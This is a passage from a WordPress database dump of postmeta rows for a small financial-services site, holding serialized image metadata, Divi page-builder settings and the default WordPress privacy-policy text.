6:\"height\";i:404;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37964;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"41\";s:8:\"quantity\";d:100;s:4:\"webp\";i:0;}}'),(1825,473,'_wp_attached_file','2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg'),(1826,473,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:2560;s:4:\"file\";s:62:\"2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\";s:8:\"filesize\";i:169109;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22076;}s:5:\"large\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57487;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17016;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43849;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88731;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125886;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23130;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:56:\"Shaking-Hands-Icon-No-Background-Hex-666666-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49197;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23590;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28006;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-1080x1080.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60569;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28389;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147323;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:57:\"Shaking-Hands-Icon-No-Background-Hex-666666-1280x1280.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72553;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-980x980.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55109;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:55:\"Shaking-Hands-Icon-No-Background-Hex-666666-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29379;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:47:\"Shaking-Hands-Icon-No-Background-Hex-666666.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"78\";s:8:\"quantity\";d:82;s:4:\"webp\";i:0;}}'),(780,240,'_wp_attached_file','2023/03/CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-scaled.jpg'),(595,3,'_et_pb_side_nav','off'),(596,3,'_et_pb_use_builder','on'),(597,3,'_et_pb_first_image',''),(598,3,'_et_pb_truncate_post',''),(599,3,'_et_pb_truncate_post_date',''),(600,3,'_et_pb_old_content','<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->'),(592,3,'_edit_last','3'),(593,3,'_et_pb_post_hide_nav','default'),(594,3,'_et_pb_page_layout','et_right_sidebar'),(2065,345,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(1957,14,'_et_pb_built_for_post_type','page'),(1963,14,'_thumbnail_id','0'),(1964,14,'_global_colors_info','{}'),(1965,14,'_et_pb_first_image',''),(1966,14,'_et_pb_truncate_post',''),(1967,14,'_et_pb_truncate_post_date',''),(1968,14,'_et_builder_version','VB|Divi|4.20.2'),(2015,528,'_et_pb_truncate_post',''),(2016,528,'_et_pb_truncate_post_date',''),(2017,528,'_et_builder_version','VB|Divi|4.20.4'),(1991,523,'_et_pb_built_for_post_type','page'),(1992,523,'_et_pb_ab_subjects',''),(1993,523,'_et_pb_enable_shortcode_tracking',''),(1970,522,'_et_pb_built_for_post_type','page'),(1972,14,'_et_theme_builder_marked_as_unused','2023-03-26 19:56:53'),(1973,10,'_et_theme_builder_marked_as_unused','2023-03-26 19:56:53'),(1999,523,'_et_pb_first_image',''),(2000,523,'_et_pb_truncate_post',''),(2001,523,'_et_pb_truncate_post_date',''),(2002,523,'_et_builder_version','VB|Divi|4.20.2'),(2003,528,'_et_pb_use_builder','on'),(2004,528,'_et_pb_show_page_creation','off'),(2009,528,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"528\" /]'),(2010,528,'_et_pb_custom_css',''),(2011,528,'_et_pb_gutter_width','3'),(783,242,'_edit_lock','1679247662:3'),(784,242,'_edit_last','3'),(785,243,'_wp_attached_file','2023/03/Businessman-with-money-on-mind-1000x657-1.jpg'),(786,243,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:657;s:4:\"file\";s:53:\"2023/03/Businessman-with-money-on-mind-1000x657-1.jpg\";s:8:\"filesize\";i:541412;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31169;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22900;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106943;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40694;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44006;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63604;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67627;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-980x644.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161907;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:53:\"Businessman-with-money-on-mind-1000x657-1-480x315.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52264;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"denisismagilov - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:59:\"Businessman with money on his mind on chalkboard background\";s:17:\"created_timestamp\";s:10:\"1397260800\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:30:\"Businessman with money on mind\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:5:\"money\";i:1;s:8:\"thinking\";i:2;s:11:\"businessman\";i:3;s:9:\"financial\";i:4;s:6:\"growth\";i:5;s:4:\"rich\";i:6;s:3:\"man\";i:7;s:4:\"male\";i:8;s:8:\"business\";i:9;s:6:\"person\";i:10;s:14:\"businessperson\";i:11;s:10:\"background\";i:12;s:4:\"idea\";i:13;s:10:\"successful\";i:14;s:8:\"currency\";i:15;s:4:\"cash\";i:16;s:11:\"imagination\";i:17;s:4:\"mind\";i:18;s:7:\"pensive\";i:19;s:10:\"thoughtful\";i:20;s:13:\"brainstorming\";i:21;s:10:\"investment\";i:22;s:7:\"success\";i:23;s:6:\"symbol\";i:24;s:5:\"young\";i:25;s:7:\"concept\";i:26;s:5:\"adult\";i:27;s:7:\"finance\";i:28;s:7:\"savings\";i:29;s:7:\"account\";i:30;s:9:\"caucasian\";i:31;s:5:\"smart\";i:32;s:12:\"entrepreneur\";i:33;s:10:\"attractive\";i:34;s:6:\"sketch\";i:35;s:7:\"drawing\";i:36;s:6:\"doodle\";i:37;s:8:\"creative\";i:38;s:3:\"law\";i:39;s:5:\"legal\";i:40;s:6:\"market\";i:41;s:9:\"marketing\";i:42;s:11:\"achievement\";i:43;s:11:\"development\";i:44;s:9:\"education\";i:45;s:9:\"knowledge\";i:46;s:6:\"bubble\";i:47;s:7:\"thought\";i:48;s:10:\"chalkboard\";i:49;s:10:\"blackboard\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"73\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(2784,321,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(489,138,'_et_pb_old_content','<p><img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /></p><p> </p><p>We have your back.<br />American Income Life has ours.</p><p>JU. Sutton Financial offers</p><p> </p>'),(499,13,'_et_theme_builder_marked_as_unused','2023-03-03 19:45:03'),(487,138,'_et_pb_page_layout','et_right_sidebar'),(488,138,'_et_pb_side_nav','off'),(486,138,'_et_pb_post_hide_nav','default'),(472,138,'_et_pb_built_for_post_type','page'),(479,138,'_global_colors_info','{}'),(480,138,'_et_pb_first_image',''),(481,138,'_et_pb_truncate_post',''),(482,138,'_et_pb_truncate_post_date',''),(483,138,'_et_builder_version','VB|Divi|4.20.4'),(473,138,'_et_pb_ab_subjects',''),(474,138,'_et_pb_enable_shortcode_tracking',''),(468,138,'_et_pb_use_builder','on'),(469,138,'_edit_last','1'),(470,138,'_edit_lock','1681248961:3'),(475,138,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"138\" /]'),(476,138,'_et_pb_custom_css',''),(477,138,'_et_pb_gutter_width','3'),(485,138,'_wp_page_template','page-template-blank.php'),(2907,384,'_wp_old_date','2023-04-04'),(1817,469,'_wp_attached_file','2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg'),(1859,486,'_wp_trash_meta_status','publish'),(1860,486,'_wp_trash_meta_time','1679671946'),(2942,138,'_thumbnail_id','0'),(3177,345,'_et_builder_module_features_cache','a:2:{i:0;s:108:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":{\"528\":\"2023-04-10 13:15:21\",\"523\":\"2023-04-08 21:29:25\"},\"wpe\":[]}\";i:1;a:16:{s:46:\"et_pb_section_32a8701e7e646d30f5be44fd1d6edd9d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_c3a1c68d2adfcb81a9fe911b91eb1bb1\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c3c3262b1d77b10d3324caf58042baf2\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_3956b2fa036f918b04bf26e28a131ba0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_172db018d4013a78711547224058b6c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_31fed4101e23ca62587312176ae0485e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_752d704473cb7649afba5776e481f4d6\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_f83fbae2b90aa9ca67e8f7cdaad5f02e\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1c9d155ec9a950d8f0cf7d9fe5cf84e2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f6c6d70948c656773a17b5acb09701d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(3171,327,'_et_dynamic_cached_attributes','a:0:{}'),(3172,327,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(1891,472,'_wp_attachment_image_alt','group of people'),(1892,471,'_wp_attachment_image_alt','secure contract icon'),(1893,473,'_wp_attachment_image_alt','handshake icon'),(1894,474,'_wp_attachment_image_alt','thought bubbles'),(1895,475,'_wp_attachment_image_alt','umbrella'),(1901,506,'_wp_trash_meta_status','publish'),(1902,506,'_wp_trash_meta_time','1679859409'),(1903,507,'_wp_trash_meta_status','publish'),(1904,507,'_wp_trash_meta_time','1679859444'),(1907,508,'_wp_trash_meta_status','publish'),(1908,508,'_wp_trash_meta_time','1679859562'),(1909,509,'_wp_trash_meta_status','publish'),(1910,509,'_wp_trash_meta_time','1679859595'),(3150,324,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3151,324,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3152,324,'_et_dynamic_cached_attributes','a:0:{}'),(3153,324,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3154,315,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(1924,513,'_et_autogenerated_title','0'),(1925,513,'_et_default','1'),(1926,513,'_et_enabled','1'),(1927,513,'_et_header_layout_id','510'),(1928,513,'_et_header_layout_enabled','1'),(1929,513,'_et_body_layout_id','0'),(1930,513,'_et_body_layout_enabled','1'),(1931,513,'_et_footer_layout_id','0'),(1932,513,'_et_footer_layout_enabled','0'),(1933,512,'_et_template','513'),(1934,514,'_et_pb_built_for_post_type','page'),(1935,512,'_wp_trash_meta_status','auto-draft'),(1936,512,'_wp_trash_meta_time','1679860288'),(1937,512,'_wp_desired_post_slug',''),(1938,513,'_et_theme_builder_marked_as_unused','2023-03-26 19:51:28'),(1939,510,'_et_theme_builder_marked_as_unused','2023-03-26 19:51:28'),(1940,13,'_wp_trash_meta_status','publish'),(1941,13,'_wp_trash_meta_time','1679860288'),(1942,13,'_wp_desired_post_slug','theme-builder-layout'),(1943,12,'_wp_trash_meta_status','publish'),(1944,12,'_wp_trash_meta_time','1679860288'),(1945,12,'_wp_desired_post_slug','default-website-template'),(1951,10,'_et_pb_show_page_creation','off'),(1959,14,'_et_pb_enable_shortcode_tracking',''),(1960,14,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"14\" /]'),(1961,14,'_et_pb_custom_css',''),(1962,14,'_et_pb_gutter_width','3'),(1947,516,'_et_pb_built_for_post_type','page'),(1948,516,'_wp_trash_meta_status','publish'),(1949,516,'_wp_trash_meta_time','1679860368'),(1950,516,'_wp_desired_post_slug','j-sutton-header'),(1958,14,'_et_pb_ab_subjects',''),(1997,523,'_thumbnail_id','0'),(1998,523,'_global_colors_info','{}'),(1994,523,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"523\" /]'),(1995,523,'_et_pb_custom_css',''),(1996,523,'_et_pb_gutter_width','3'),(2028,533,'_et_pb_built_for_post_type','page'),(2029,534,'_et_pb_built_for_post_type','page'),(1921,510,'_et_pb_use_builder','on'),(1922,510,'_et_pb_show_page_creation','on'),(2019,525,'_wp_trash_meta_status','auto-draft'),(2020,525,'_wp_trash_meta_time','1679861055'),(2021,525,'_wp_desired_post_slug',''),(2022,526,'_et_theme_builder_marked_as_unused','2023-03-26 